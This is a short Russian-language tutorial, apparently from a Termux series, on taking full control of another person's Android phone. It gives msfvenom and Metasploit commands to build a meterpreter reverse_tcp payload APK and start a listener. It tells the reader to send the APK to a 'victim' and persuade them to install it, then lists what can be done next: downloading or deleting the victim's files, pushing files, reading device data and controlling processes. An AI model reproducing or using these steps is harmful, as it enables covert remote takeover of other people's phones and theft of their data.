Получаем полный доступ к чужому телефону
Termux Tutorials | RUSС чего начнём?
Для начала нужно установить приложение Termux и в нём фреймворк "Metasploit". В прошлых статьях об этом я уже говорил.
pkg update
Далее нужно перейти по следующему пути, введя команду
/data/data/com.termux/files/usr/opt/metasploit-framework
Введя команду ls вы должны увидеть примерно это:
Теперь создаем файл который будем кидать жертве, командой
msfvenom -p android/meterpreter/reverse_tcp LHOST=(наш IP) LPORT=4444 R> /sdcard/payload.apk
Мы создали файл, который хранится в пути /sdcard/payload.apk
Теперь нужно скинуть его жертве и жертва должна установить этот apk файл на своё устройство. Допустим жертва установила apk на своё устройство. Мы же запускаем metasploit и поочередно вводим каждую команду
use exploit/milti/handler
set payload android/meterpreter/reverse_tcp
set LHOST (наш тот же IP)
set LPORT 4444
exploit
Если всё прошло успешно, вы получите полный доступ к устройству жертвы. Введя команду help можно будет посмотреть список доступных команд. Вкратце расскажу, что можно будет сделать:
- Скачивать, удалять файлы жертвы
- Скидывать в его устройство свои файлы
- Посмотреть полную информацию о его устройстве
- Контролировать процессы устройства